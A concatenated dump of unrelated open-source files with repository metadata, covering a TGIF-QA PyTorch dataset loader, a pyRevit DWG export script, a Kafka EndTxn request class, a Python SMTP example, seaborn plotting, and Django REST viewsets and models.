self.feat_h5 = h5py.File(hdf5_path, 'r')
self.image_feature_net = 'resnet'
self.layer = 'pool5'
self.word_matrix = word_matrix
self.word2idx = word2idx
self.ans2idx = ans2idx
self.transform = transforms.Compose([transforms.Resize((224, 224)),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
def __len__(self):
return len(self.dataset)
def __getitem__(self, indices):
if isinstance(indices, (tuple, list)):
data_list = []
for index in indices:
data_list.extend(self.get_single_item(index))
return data_list
return self.get_single_item(indices)
def get_single_item(self, index):
text_data = self.dataset[index]
img_path, question, answer, type, video_id, caption, _ = text_data
# video_feature = self.load_video_feature(video_id)
# video_feature = pad_video(video_feature, [35,2048])
imgs = self.load_imgs(img_path)
question_embed, ql = self.convert_sentence_to_matrix(question)
label = self.ans2idx[answer]
return imgs, question_embed, ql, label, type
def load_video_feature(self, video_id):
if self.image_feature_net == 'resnet':
assert self.layer.lower() in ['pool5', 'res5c']
video_feature = np.array(self.feat_h5[str(video_id)])
return video_feature
# if self.layer.lower() == 'res5c':
# video_feature = np.transpose(
# video_feature.reshape([-1, 2048, 7, 7]), [0, 2, 3, 1])
# assert list(video_feature.shape[1:]) == [7, 7, 2048]
# elif self.layer.lower() == 'pool5':
# video_feature = np.expand_dims(video_feature, axis=1)
# video_feature = np.expand_dims(video_feature, axis=1)
# assert list(video_feature.shape[1:]) == [1, 1, 2048]
# elif self.image_feature_net.lower() == 'c3d':
# assert self.layer.lower() in ['fc6', 'conv5b']
# video_feature = np.array(self.feat_h5[video_id])
#
# if self.layer.lower() == 'fc6':
# if len(video_feature.shape) == 1:
# video_feature = np.expand_dims(video_feature, axis=0)
# video_feature = np.expand_dims(video_feature, axis=1)
# video_feature = np.expand_dims(video_feature, axis=1)
# assert list(video_feature.shape[1:]) == [1, 1, 4096]
# elif self.layer.lower() == 'conv5b':
# if len(video_feature.shape) == 4:
# video_feature = np.expand_dims(video_feature, axis=0)
# video_feature = np.transpose(
# video_feature.reshape([-1, 1024, 7, 7]), [0, 2, 3, 1])
# assert list(video_feature.shape[1:]) == [7, 7, 1024]
#
# elif self.image_feature_net.lower() == 'concat':
# assert self.layer.lower() in ['fc', 'conv']
# c3d_feature = np.array(self.feat_h5["c3d"][video_id])
# resnet_feature = np.array(self.feat_h5["resnet"][video_id])
# if len(c3d_feature.shape) == 1:
# c3d_feature = np.expand_dims(c3d_feature, axis=0)
# # if len(resnet_feature.shape) == 1:
# # resnet_feature = np.expand_dims(resnet_feature, axis=0)
#
# if not len(c3d_feature) == len(resnet_feature):
# max_len = min(len(c3d_feature), len(resnet_feature))
# c3d_feature = c3d_feature[:max_len]
# resnet_feature = resnet_feature[:max_len]
#
# if self.layer.lower() == 'fc':
# video_feature = np.concatenate((c3d_feature, resnet_feature),
# axis=len(c3d_feature.shape) - 1)
# video_feature = np.expand_dims(video_feature, axis=1)
# video_feature = np.expand_dims(video_feature, axis=1)
# assert list(video_feature.shape[1:]) == [1, 1, 4096 + 2048]
# elif self.layer.lower() == 'conv':
# c3d_feature = np.transpose(c3d_feature.reshape([-1, 1024, 7, 7]), [0, 2, 3, 1])
# resnet_feature = np.transpose(resnet_feature.reshape([-1, 2048, 7, 7]), [0, 2, 3, 1])
# video_feature = np.concatenate((c3d_feature, resnet_feature),
# axis=len(c3d_feature.shape) - 1)
# assert list(video_feature.shape[1:]) == [7, 7, 1024 + 2048]
# return video_feature
def load_imgs(self, img_path):
img_root = '/home/yuan/project/tgif-qa/code/dataset/tgif/frames'
path = os.path.join(img_root, img_path) + '.gi'
img_list = os.listdir(path)
img_list = sorted(img_list, key=lambda x:int(x.split('.')[0]))
img_list = self.pad_imgs(img_list=img_list)
imgs = []
for i in img_list:
ip = os.path.join(path, i)
img = Image.open(ip).convert('RGB')
img = self.transform(img)
imgs.append(img)
imgs = torch.stack(imgs, 1)
return imgs
def pad_imgs(self, img_list, max_length=64):
'''
Fill pad to imgs to have same length.
Pad in Left.
'''
length = len(img_list)
num_padding = length - max_length
if num_padding == 0:
padded_imgs = img_list
else:
steps = np.linspace(0, length, num=max_length, endpoint=False, dtype=np.int32)
img_list = np.array(img_list)
padded_imgs = list(img_list[steps])
return padded_imgs
def convert_sentence_to_matrix(self, sentence):
words = re.split('[ \'-,]', sentence.strip('\ \?\.\n'))
words_pad = pad_sequences(words, max_length=16)
sent2indices = [self.word2idx[w] if w in self.word2idx else 2 for w in words_pad]
word_embeds = [np.float32(self.word_matrix[x-2]) for x in sent2indices]
return word_embeds, len(words)
|
[
"yuanhuan9412@163.com"
] |
yuanhuan9412@163.com
|
507a3b401ef53bd3971001e9e1d39b9d98b2a3e4
|
4873d24dd9e93ed28a282539b5d8e06e4991adb0
|
/BikeAndBim.extension/BikeAnd.tab/View.panel/Export_cad.pushbutton/script.py
|
5976b82050953ed7d83139531954004833f24b8f
|
[
"MIT"
] |
permissive
|
appolimp/Revit_extensions_pyRevit
|
71e1c4c33fad5f71636dc72afd196f7607f66ef9
|
1790b18c12e8bc603a6a726b2733678494180986
|
refs/heads/main
| 2023-07-02T06:32:05.191637
| 2021-08-09T09:06:13
| 2021-08-09T09:06:13
| 307,311,747
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,256
|
py
|
# coding=utf-8
from rpw import db, DB, UI, uidoc, doc, logger
from pyrevit import forms
from System.Collections.Generic import List
import os.path
class ElemNotFound(Exception):
pass
VALID_VIEW_TYPE = [DB.ViewType.FloorPlan,
DB.ViewType.CeilingPlan,
DB.ViewType.Elevation,
DB.ViewType.ThreeD,
DB.ViewType.DrawingSheet,
DB.ViewType.DraftingView,
DB.ViewType.EngineeringPlan,
DB.ViewType.Section,
DB.ViewType.Detail,
]
STANDARD_PREFIX = 'Inter your prefix or ~ for ignore'
DWG_OPTION_NAME = 'RC Layers Standard VBP'
@db.Transaction.ensure('Edit crop view')
def main():
is_config = not __shiftclick__
dwg_option_name = get_dwg_option_name(is_config)
result, folder = export_dwg(dwg_option_name, STANDARD_PREFIX)
task_dialog('info',
'Export {} files to <{}>\nExport option is "{}"'.format(len(result), folder, dwg_option_name),
data=sorted(result))
def get_dwg_option_name(is_config=True):
if is_config:
name_option = get_name_option_from_config_or_none()
if name_option and is_valid_export_option(name_option):
return name_option
name_option = get_option_name_from_user()
set_option_to_config(name_option)
logger.debug('DWG option: "{}"'.format(name_option))
return name_option
def get_name_option_from_config_or_none():
try:
cfg = get_config()
if cfg.has_section('Setup_names'):
section = cfg.get_section('Setup_names')
file_name = get_file_name_for_config()
if section.has_option(file_name):
name_from_config = section.get_option(file_name)
logger.debug('Get Option name from config: "{}"'.format(name_from_config))
return name_from_config
except Exception:
logger.error('Get error from export config')
def get_file_name_for_config():
if doc.IsWorkshared:
path = DB.BasicFileInfo.Extract(doc.PathName).CentralPath
else:
path = doc.PathName
file_name = os.path.split(path)[-1]
logger.debug('Get file name: {}'.format(file_name))
return file_name
def set_option_to_config(name_option):
try:
cfg = get_config()
if not cfg.has_section('Setup_names'):
cfg.add_section('Setup_names')
section = cfg.get_section('Setup_names')
file_name = get_file_name_for_config()
section.set_option(file_name, name_option)
cfg.save_changes()
logger.debug('Set Option name "{}" from file: "{}"'.format(name_option, file_name))
except Exception:
logger.error('Get error from export config')
def get_config():
from pyrevit.userconfig import PyRevitConfig
import os
this_folder = os.path.dirname(os.path.abspath(__file__))
init_file = os.path.join(this_folder, 'config.ini')
cfg = PyRevitConfig(init_file)
return cfg
def get_option_name_from_user():
setup_names = DB.BaseExportOptions.GetPredefinedSetupNames(doc)
res = forms.SelectFromList.show(setup_names,
title='Predefined setup Names for export',
width=300,
height=300,
button_name='Select option for export')
logger.debug('Get name from user "{}"'.format(res))
return res
def export_dwg(dwg_option_name, standard_prefix):
result = []
views_id = get_selected_views_id()
dwg_option = get_dwg_option(dwg_option_name)
path_with_name = get_path(standard_prefix)
folder, prefix = get_folder_and_prefix_by_path(path_with_name, standard_prefix)
for view_id in views_id:
name = prefix + get_name_view_by_id(view_id)
col = List[DB.ElementId]([view_id])
doc.Export(folder, name, col, dwg_option)
delete_pcp_file(folder, name)
result.append(name)
logger.debug('View #{}. Export with name "{}"'.format(view_id, name))
logger.info('Export {} files for folder: <{}>'.format(len(views_id), folder))
return result, folder
def delete_pcp_file(folder, name):
path = os.path.join(folder, name + '.pcp')
if os.path.isfile(path):
try:
os.remove(path)
logger.debug('Delete .pcp file by path <{}>'.format(path))
except Exception:
pass
def get_selected_views_id():
pre_selected = uidoc.Selection.GetElementIds()
selected_views_id = List[DB.ElementId]()
for elem_id in pre_selected:
elem = doc.GetElement(elem_id)
if elem and isinstance(elem, DB.View) and elem.ViewType in VALID_VIEW_TYPE:
selected_views_id.Add(elem_id)
if selected_views_id:
logger.debug('User select {} views'.format(len(selected_views_id)))
return selected_views_id
if doc.ActiveView.ViewType in VALID_VIEW_TYPE:
logger.debug('Not found any valid selected view. So return ActiveView id')
return List[DB.ElementId]([doc.ActiveView.Id])
raise ElemNotFound('Valid selected view and ActiveView not found. ActiveView.ViewType is "{}"'.format(
doc.ActiveView.ViewType))
def get_name_view_by_id(view_id):
view = doc.GetElement(view_id)
if view:
return make_valid_name(view.Title)
raise ElemNotFound('View #{}. Not found in document'.format(view_id))
def make_valid_name(name):
import string
NON_VALID_CHARACTERS = ['\\', '/', ':', '*', '?', '"', '<', '>', '|']
valid_name = ''.join(ch if ch not in NON_VALID_CHARACTERS else ' ' for ch in name)
logger.debug('Name {}. Make valid -> {}'.format(name, valid_name))
return valid_name
def get_path(prefix):
window = UI.FileSaveDialog("Файлы AutoCAD 2013 DWG (*.dwg)|*.dwg")
window.InitialFileName = prefix
window.Title = 'Choose folder and inter your prefix or ~ for ignore'
window.Show()
path = window.GetSelectedModelPath()
if path:
string_path = DB.ModelPathUtils.ConvertModelPathToUserVisiblePath(path)
logger.debug('Get path from user: <{}>'.format(string_path))
return string_path
raise ElemNotFound('Cant get path from user')
def get_folder_and_prefix_by_path(path, standard_prefix):
folder, name = os.path.split(path)
prefix, ext = os.path.splitext(name)
if prefix in [standard_prefix, '~']:
prefix = ''
else:
logger.info('Get prefix: "{}"'.format(prefix))
logger.info('Get folder <{}>'.format(folder))
return folder, prefix
def get_dwg_option(option_name):
if is_valid_export_option(option_name):
dwg_option = DB.DWGExportOptions.GetPredefinedOptions(doc, option_name)
dwg_option.FileVersion = DB.ACADVersion.R2013
logger.debug('Option name is valid: "{}"'.format(option_name))
return dwg_option
raise ElemNotFound('Setup name for export not found with name "{}"'.format(option_name))
def is_valid_export_option(option_name):
setup_names = DB.BaseExportOptions.GetPredefinedSetupNames(doc)
return option_name in setup_names
def task_dialog(type_mes, msg, data=None):
"""
For create task dialog with error and message
:param type_mes: info or error
:type type_mes: str
:param msg: Message for window
:type msg: str
:param data: Text for expanded content
:type data: []
"""
window = UI.TaskDialog('Export CAD')
window.TitleAutoPrefix = False
if type_mes == 'info':
window.MainIcon = UI.TaskDialogIcon.TaskDialogIconInformation
window.MainInstruction = 'Info'
window.MainContent = msg
else:
window.MainIcon = UI.TaskDialogIcon.TaskDialogIconError
window.MainInstruction = 'Error'
window.MainContent = msg
if data:
window.ExpandedContent = '\n'.join(data)
window.CommonButtons = UI.TaskDialogCommonButtons.Ok
window.Show()
if __name__ == '__main__':
logger.setLevel(60)
try:
main()
except Exception as err:
raise
# task_dialog(type_mes='error', msg='Please, write Nikita', data=err.args)
|
[
"65594849+appolimp@users.noreply.github.com"
] |
65594849+appolimp@users.noreply.github.com
|
4192c5574c63d75afb5a68bf33c50f46e23697d0
|
4bb665407ec8c323de16ad8c033fba7769b472b7
|
/InputScript.py
|
fee163c779dfd4f896ca0d225c5bbd7884dc0152
|
[] |
no_license
|
MNienaber2727/CS237_caching_pubsub
|
45de2a37f0afe7369ea92330df5ff65705224af1
|
8459b6bb1dc4406eb0d0d652568374f577e26f9a
|
refs/heads/main
| 2023-05-23T09:32:45.210535
| 2021-06-11T20:12:50
| 2021-06-11T20:12:50
| 370,917,885
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 676
|
py
|
import csv
from random import seed
from random import randint
import sys
size = int(sys.argv[1])
pubID = [0]*size
restaurant = [0]*size
food_item = [0]*size
discount = [0]*size
val = [0]*size
validSubs = []
validSubs.append("10001")
validSubs.append("00110")
#validSubs.append("11000")
#print(data)
for j in range(1,4):
seed(randint(0,1000))
data = [0]*size
for i in range(size):
pubID[i] = randint(0,1)
val[i] = validSubs[randint(0,1)]
data[i]=[pubID[i],val[i]]
file="/home/mason/Documents/CS237_caching_pubsub/test{benchmark}_{tmp}.csv".format(benchmark=size,tmp=j)
with open(file, 'w') as f:
writer = csv.writer(f)
writer.writerows(data)
|
[
"MNienaber27@hotmail.com"
] |
MNienaber27@hotmail.com
|
78f2c8d2d7c3d68984934ce71f7e03a5b5f88a88
|
b424a13f032d5a607e6df4dd78bc47ad1d06a147
|
/scipy/sparse/linalg/tests/test_onenormest.py
|
7916996b7bcd8d29065abed19a128c453bb04c5b
|
[] |
no_license
|
EnjoyLifeFund/macSierra-py36-pkgs
|
1e7eeb9b55415da6eb12465d67730d76e9cc619a
|
0ac677fbbfa7b6d8c527fe2c759ba05117b07fd2
|
refs/heads/master
| 2021-01-20T10:23:50.044019
| 2017-09-05T02:53:26
| 2017-09-05T02:53:26
| 90,333,987
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 115
|
py
|
../../../../../../../Cellar/scipy/0.19.1_1/lib/python3.6/site-packages/scipy/sparse/linalg/tests/test_onenormest.py
|
[
"raliclo@gmail.com"
] |
raliclo@gmail.com
|
9247d33df0eac0e28bd18e72ec4448cf71df1f1e
|
285a12ef65663e16d9237bd9991d2d0f2eea7363
|
/Itertools/Itertools-Product.py
|
3fada69cfad2f5100d55935fe93324a68c6cdc13
|
[] |
no_license
|
ZhiquanW/Learning-Python-HackerRank
|
18d7eaee624ae46d48cdce5a25334a5f44715156
|
4ccb8364b684c028720f146caa8f2883a0a91ca0
|
refs/heads/master
| 2021-08-31T19:28:01.134210
| 2017-12-22T14:41:44
| 2017-12-22T14:41:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 103
|
py
|
import itertools
a,b = map(int,input().split()),map(int,input().split())
print(*itertools.product(a,b))
|
[
"mysabrehawk@outlook.com"
] |
mysabrehawk@outlook.com
|
37bcd938bdd77011bda3d17d3f856bd3ffd513e6
|
8edd63a42469bf09fcad1c1070995ceda6e49646
|
/env/lib/python2.7/site-packages/observations/r/delivery.py
|
dca99a0329f9cacbcf4199fbe48dd16f61895323
|
[] |
no_license
|
silky/bell-ppls
|
fa0b5418f40dab59de48b7220ff30caba5945b56
|
369e7602c810b694a70ac1e875017480c8910ac8
|
refs/heads/master
| 2020-04-06T08:40:28.588492
| 2018-11-01T06:51:33
| 2018-11-01T06:51:33
| 157,312,221
| 1
| 0
| null | 2018-11-13T03:04:18
| 2018-11-13T03:04:18
| null |
UTF-8
|
Python
| false
| false
| 1,589
|
py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import numpy as np
import os
import sys
from observations.util import maybe_download_and_extract
def delivery(path):
"""Delivery Time Data
Delivery Time Data, from Montgomery and Peck (1982). The aim is to
explain the time required to service a vending machine (Y) by means of
the number of products stocked (X1) and the distance walked by the route
driver (X2).
A data frame with 25 observations on the following 3 variables.
`n.prod`
Number of Products
`distance`
Distance
`delTime`
Delivery time
Montgomery and Peck (1982, p.116)
Args:
path: str.
Path to directory which either stores file or otherwise file will
be downloaded and extracted there.
Filename is `delivery.csv`.
Returns:
Tuple of np.ndarray `x_train` with 25 rows and 3 columns and
dictionary `metadata` of column headers (feature names).
"""
import pandas as pd
path = os.path.expanduser(path)
filename = 'delivery.csv'
if not os.path.exists(os.path.join(path, filename)):
url = 'http://dustintran.com/data/r/robustbase/delivery.csv'
maybe_download_and_extract(path, url,
save_file_name='delivery.csv',
resume=False)
data = pd.read_csv(os.path.join(path, filename), index_col=0,
parse_dates=True)
x_train = data.values
metadata = {'columns': data.columns}
return x_train, metadata
|
[
"akobeid.1@gmail.com"
] |
akobeid.1@gmail.com
|
8d05cd1d030aee3c13850f7a8918a4ff76bb2f25
|
48af880c1aa54c6986c218a231bd9eb97c5bee34
|
/email_example3.py
|
37965c59f0fc5f51cad69a35b5609c8193af49e3
|
[] |
no_license
|
vcazcarra/raspberry_pi
|
e91f32ae676e51c02576f5a2637fc91751b01718
|
a322ac74c6ee3628955bfcb07afc9e4a11c744cd
|
refs/heads/master
| 2023-07-09T06:23:49.212119
| 2021-08-12T08:53:15
| 2021-08-12T08:53:15
| 395,252,226
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 431
|
py
|
import smtplib, ssl
port = 465 # For SSL
smtp_server = "smtp.gmail.com"
sender_email = "---------"
receiver_email = "--------
password = "---------"
message = """\
Subject: Hi there
This message is sent from Python."""
context = ssl.create_default_context()
with smtplib.SMTP_SSL(smtp_server, port, context=context) as server:
server.login(sender_email, password)
server.sendmail(sender_email, receiver_email, message)
|
[
"noreply@github.com"
] |
vcazcarra.noreply@github.com
|
2866fd7b0bed2c7dcb21ed78c1b95aab2ebfc698
|
43374a7e2cc5dcb634211e5380ff2b4e3ff7d7d7
|
/RR_RAPPOR.py
|
717f1dabe73fd6d2bbd3a6e66735e09e52bf79c5
|
[] |
no_license
|
WeiNingChen/RHR
|
395818fc3033de2a9937c29193b2e3e7b595d64e
|
d623e672881b823fc6ad33ceb7fbe03ba18ad756
|
refs/heads/master
| 2022-10-07T03:27:35.988875
| 2020-06-10T23:23:30
| 2020-06-10T23:23:30
| 271,405,761
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,433
|
py
|
#%matplotlib inline
import numpy as np
import random
import math
import matplotlib.pyplot as plt
import timeit
from functions import *
#The class for Randomized Response:
class Randomized_Response:
def __init__(self, absz, pri_para): # absz: alphabet size, pri_para: privacy parameter
self.absz = absz #alphabet size k
self.exp = math.exp(pri_para) #privacy parameter
self.flip_prob = (self.absz - 1)/(math.exp(pri_para) + self.absz - 1) #flipping probability to maintain local privacy
#print("Private parameter:")
#print(pri_para)
#print("Crossover prob:")
#print(self.flip_prob)
def encode_string(self, samples):
n = len(samples)
# Start by setting private_samples = samples.
private_samples_rr = np.copy(samples)
# Determine which samples need to be noised ("flipped").
flip = np.random.random_sample(n) < self.flip_prob
flip_samples = samples[flip]
# Select new samples uniformly at random to replace the original ones.
rand_samples = np.random.randint(0, self.absz - 1, len(flip_samples))
# Shift the samples if needed to avoid sampling the orginal samples.
rand_samples[rand_samples >= flip_samples] += 1
# Replace the original samples by the randomly selected ones.
private_samples_rr[flip] = rand_samples
return private_samples_rr
def decode_string(self, out_samples, normalization = 0):
#normalization options: 0: clip and normalize(default)
# 1: simplex projection
# else: no nomalization
n = len(out_samples)
(counts_rr,temp) = np.histogram(out_samples, range(self.absz+1))
# Estimate the PMF using the count vector.
p_rr = (counts_rr / float(n)) * ((self.exp + self.absz - 1) /(self.exp - 1)) - 1.0 / (self.exp - 1)
#p_rr = decode_counts(counts_rr, epsilon, n, self.absz)
# Check if truncation and renormalization is required.
if normalization == 0:
p_rr = probability_normalize(p_rr) #clip and normalize
if normalization == 1:
p_rr = project_probability_simplex(p_rr) #simplex projection
return p_rr
class RAPPOR:
def __init__(self, absz, pri_para): # absz: alphabet size, pri_para: privacy parameter
self.absz = absz #alphabet size k
self.exp = math.exp(pri_para / 2.0) #privacy parameter
self.flip_prob = 1/(math.exp(pri_para/2.0) + 1) #flipping probability to maintain local privacy
def encode_string(self, samples):
n = len(samples)
users = range(n)
# One-hot encode the input integers.
private_samples_rappor = np.zeros((n, self.absz))
private_samples_rappor[users, samples] = 1
# Flip the RAPPOR encoded bits with probability self.flip_prob
flip = np.random.random_sample((n, self.absz))
return np.logical_xor(private_samples_rappor, flip < self.flip_prob)
def encode_string_light(self, samples):
#return to count vector of rappor responce, which is less memory intensive
#also return the cumulated time for adding rappor vectors, which should also be considered as decoding time.
n = len(samples)
users = range(n)
time = 0
counts = np.zeros(self.absz)
# One-hot encode the input integers.
for i in range(n):
private_samples_rappor = np.zeros(self.absz)
private_samples_rappor[samples[i]] = 1
# Flip the RAPPOR encoded bits with probability self.flip_prob
flip = np.random.random_sample(self.absz)
private_samples_rappor = np.logical_xor(private_samples_rappor, flip < self.flip_prob)
start_time = timeit.default_timer() #record adding time
counts = counts + private_samples_rappor # add rappor responce vector
time = time + timeit.default_timer() - start_time
return counts,time
def encode_string_compress(self, samples):
#encode rappor responces into locations of one, which saves communcation budget when eps is large
n = len(samples)
out = [0]*n
# One-hot encode the input integers.
for i in range(n):
private_samples_rappor = np.zeros(self.absz)
private_samples_rappor[samples[i]] = 1
# Flip the RAPPOR encoded bits with probability self.flip_prob
flip = np.random.random_sample(self.absz)
private_samples_rappor = np.logical_xor(private_samples_rappor, flip < self.flip_prob)
out[i] = np.where(private_samples_rappor)[0] # get the locations of ones
out_list = np.concatenate(out)
return out_list
def decode_counts(self, counts, n, normalization = 0):
#normalization options: 0: clip and normalize(default)
# 1: simplex projection
# else: no nomalization
# Estimate the PMF using the count vector
p_rappor = (counts / float(n)) * ((self.exp + 1) /(self.exp - 1)) - 1.0 / (self.exp - 1)
if normalization == 0:
p_rappor = probability_normalize(p_rappor) #clip and normalize
if normalization == 1:
p_rappor = project_probability_simplex(p_rappor) #simplex projection
return p_rappor
|
[
"wnchen1994@gmail.com"
] |
wnchen1994@gmail.com
|
5f9036702734ca973c14594d1a5935aad7513076
|
e9f775a0fd9390f586968967a773e9d28839024c
|
/paper/scripts/qaoa_treewidth_times.py
|
417e3728e138f7964791aa73ec1b8c7736edb2bf
|
[
"BSD-3-Clause"
] |
permissive
|
gharib85/ConSequences
|
da61ea6ac4530215ef96a52165d8a6dff0298d89
|
acf9dcfd931137cbca71251cd0c09c5009aee99d
|
refs/heads/master
| 2021-02-12T04:28:36.964069
| 2018-11-17T22:28:35
| 2018-11-17T22:28:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,186
|
py
|
#!/usr/bin/env python3
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
import numpy as np
import sys
import warnings
from macros import colors
def algorithm_font(algorithm):
return r'\textsf{{{}}}'.format(algorithm)
def plot_treewidth_time_comparison(data_filename, plot_filename, verbose):
# Use latex font
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
# sns.set_context("paper", rc={"font.size": 80,
# "axes.titlesize": 80,
# "axes.labelsize": 50})
# Set up Seaborn style
sns.set(style="darkgrid")
# Import the dataframe
dataframe = pd.read_csv(data_filename)
dataframe = dataframe.loc[dataframe['vertices'].isin([10, 14, 18,
22, 26, 30])]
dataframe['algorithm'] =\
np.vectorize(algorithm_font)(dataframe['algorithm'])
if verbose:
print(dataframe)
# Compute the plot
facet_kws = dict()
warnings.simplefilter(action='ignore', category=FutureWarning)
plot = sns.factorplot(data=dataframe,
row="regularity",
x="vertices",
y="tree-decomp-time",
hue="algorithm",
palette=[colors[x] for x in ['freetdi',
'meiji',
'quickbb']],
facet_kws=facet_kws,
kind="strip",
dodge=True,
jitter=True,
alpha=0.7,
linewidth=0.1,
aspect=1.7,
size=2.5,
hue_order=['\\textsf{freetdi}',
'\\textsf{meiji-e}',
'\\textsf{quickbb}'],
legend=False)
# Manually add dashed lines to facets
for axis in plot.fig.get_axes():
for i in range(len(dataframe["vertices"]) - 1):
axis.axvline(x=i+.5, c="white", dashes=(2, 1))
axis.axhline(y=900, c='black', dashes=(3, 3))
# Set axis lengths and format
plot.set(ylim=(.0001, 100000000), yscale='log')
# Set axis labels
plot.fig.get_axes()[-1].set(xlabel="Vertices")
for axis in plot.fig.get_axes():
axis.set(ylabel="Run Time (sec)")
# Set axis labels
plot.set_titles(row_template="{row_name}-Regular")
# Add legend
plot.fig.get_axes()[0].legend(loc="upper left")
# Save figure
for extension in ['.pdf', '.png']:
plot.savefig(plot_filename + extension)
if __name__ == '__main__':
data_filename = sys.argv[1]
plot_filename = sys.argv[2]
plot_treewidth_time_comparison(data_filename, plot_filename, False)
|
[
"tdgoodrich@gmail.com"
] |
tdgoodrich@gmail.com
|
27f63b70abc0cd6f6297ee7e2b96aaee13373a40
|
1c64fb8357978cc30d027c542e5d3c26d6c1598e
|
/esque_wire/protocol/structs/api/end_txn_request.py
|
ef140186f30cd934affbf288eabc215ef0a65a52
|
[
"MIT"
] |
permissive
|
real-digital/esque-wire
|
d3c218896f8ef2300737d6c1ff161b6786418732
|
eb02c49f38b89ad5e5d25aad15fb4ad795e52807
|
refs/heads/master
| 2022-11-28T20:09:10.617618
| 2021-03-15T14:27:47
| 2021-03-15T14:27:47
| 210,586,766
| 0
| 1
|
MIT
| 2022-11-16T00:40:52
| 2019-09-24T11:33:00
|
Python
|
UTF-8
|
Python
| false
| false
| 1,078
|
py
|
from typing import ClassVar
from ...constants import ApiKey
from ..base import RequestData
class EndTxnRequestData(RequestData):
transactional_id: str
producer_id: int
producer_epoch: int
transaction_result: bool
api_key: ClassVar[ApiKey] = ApiKey.END_TXN
def __init__(self, transactional_id: str, producer_id: int, producer_epoch: int, transaction_result: bool):
"""
:param transactional_id: The transactional id corresponding to the transaction.
:type transactional_id: str
:param producer_id: Current producer id in use by the transactional id.
:type producer_id: int
:param producer_epoch: Current epoch associated with the producer id.
:type producer_epoch: int
:param transaction_result: The result of the transaction (0 = ABORT, 1 = COMMIT)
:type transaction_result: bool
"""
self.transactional_id = transactional_id
self.producer_id = producer_id
self.producer_epoch = producer_epoch
self.transaction_result = transaction_result
|
[
"noreply@github.com"
] |
real-digital.noreply@github.com
|
67d94141c63d139b3792ef29634a792447a3a5f2
|
aef4f1ef9ee0a62c80be7445accda56ff5e8ad63
|
/bookstore/comments/urls.py
|
0a530be2feb88fef400cb4ce204dde90ad2dd2f4
|
[] |
no_license
|
wangxumumu/project
|
069e4786b6b243e2c1376b8c4ff557d8dd21f2b8
|
8cd13355ad3241a372f43d495214b02282cf3b32
|
refs/heads/master
| 2021-05-05T00:22:17.420618
| 2018-04-07T05:46:14
| 2018-04-07T05:46:14
| 119,490,173
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 287
|
py
|
from django.conf.urls import url
from comments import views
urlpatterns = [
# 像这种传参的路由,说明在视图函数里面传有参数,有几个参数这里就得写几个对应的
url(r'^comment/(?P<books_id>\d+)/$',views.comment,name='comment'), # 评论内容
]
|
[
"978116554@qq.com"
] |
978116554@qq.com
|
9a9f1c472855fe98af3c0077eae971eedd712e96
|
5b5fcd6a1f0084a4345ae82061bd1b4710a797fd
|
/curso python/catalogo/catalogo/apps/webservices/ws_productos/views.py
|
3d40f65c4186333fed5b74475e6947cb75e7e1de
|
[] |
no_license
|
AlejandraCruz/cursopython
|
abbb4b414624813cfd4dcc63a9a205dc0a795ec4
|
3aa3a0445b68af0c264c7e9f7f1b152d2fdc0805
|
refs/heads/master
| 2016-09-13T07:22:34.404194
| 2016-05-10T10:57:03
| 2016-05-10T10:57:03
| 58,498,463
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 795
|
py
|
# Create your views here.
from django.http import HttpResponse
from catalogo.apps.ventas.models import *
from django.core import serializers
def ws_productos_view(request):
data = serializers.serialize("json",Producto.objects.filter(status = True))
return HttpResponse(data, mimetype='application/json')
from .serializer import producto_serializer, marca_serializer, categoria_serializer
from rest_framework import viewsets
class producto_viewset(viewsets.ModelViewSet):
queryset = Producto.objects.all()
serializer_class = producto_serializer
class marca_viewset(viewsets.ModelViewSet):
queryset = Marca.objects.all()
serializer_class = marca_serializer
class categoria_viewset(viewsets.ModelViewSet):
queryset = Categoria.objects.all()
serializer_class = categoria_serializer
|
[
"yacruz67@misena.edu.co"
] |
yacruz67@misena.edu.co
|
ad5be25309598ccb4ebf24e6860b2ff7407b3f6d
|
30a287ec53c4eb3f72e7a5882000cb6b7a8f9a91
|
/Legendarios-web/registros/models.py
|
7e07d80b69cb3401ab5b21144c5e4b246f78042c
|
[] |
no_license
|
asapper/registro-legendarios
|
a3affc941d0f5e9044647fe28b54724d2e390a8c
|
69b8e09f34d10dfe929d964669757a33b501bd69
|
refs/heads/master
| 2021-01-21T15:53:40.576625
| 2017-08-04T20:00:12
| 2017-08-04T20:00:12
| 95,399,345
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,270
|
py
|
# -*- coding: utf-8 -*-
from django.contrib.auth.models import User
from django.db import models
class Legado(models.Model):
OPCIONES_LEGADO = (
('Osos', 'Osos'),
('Jaguares', 'Jaguares'),
('Águilas', 'Águilas'),
)
nombre = models.CharField(max_length=50)
apellido = models.CharField(max_length=50)
fecha_de_nacimiento = models.DateField()
tipo = models.CharField(max_length=50, choices=OPCIONES_LEGADO)
def __str__(self):
return "{} {}".format(self.nombre, self.apellido)
class Miembro(models.Model):
OPCIONES_ESTATUS = (
('activo', 'Activo'),
('inactivo', 'Inactivo'),
)
# referencia a login credentials
user = models.OneToOneField(User)
# datos de miembro
nombre = models.CharField(max_length=50)
apellido = models.CharField(max_length=50)
fecha_de_nacimiento = models.DateField(null=True) # not required upon registration
correo = models.EmailField(unique=True)
telefono = models.CharField(max_length=25, default="")
foto = models.ImageField(upload_to="miembros/", null=True, blank=True)
tipo_de_sangre = models.CharField(max_length=25, default="")
estado_civil = models.CharField(max_length=50, default="")
pais = models.CharField(max_length=100, default="")
congregacion = models.CharField(max_length=100, default="")
numero_de_legendario = models.PositiveIntegerField(unique=True)
testimonio = models.TextField(default="")
estatus = models.CharField(max_length=25, choices=OPCIONES_ESTATUS, default='activo')
# links for social networks
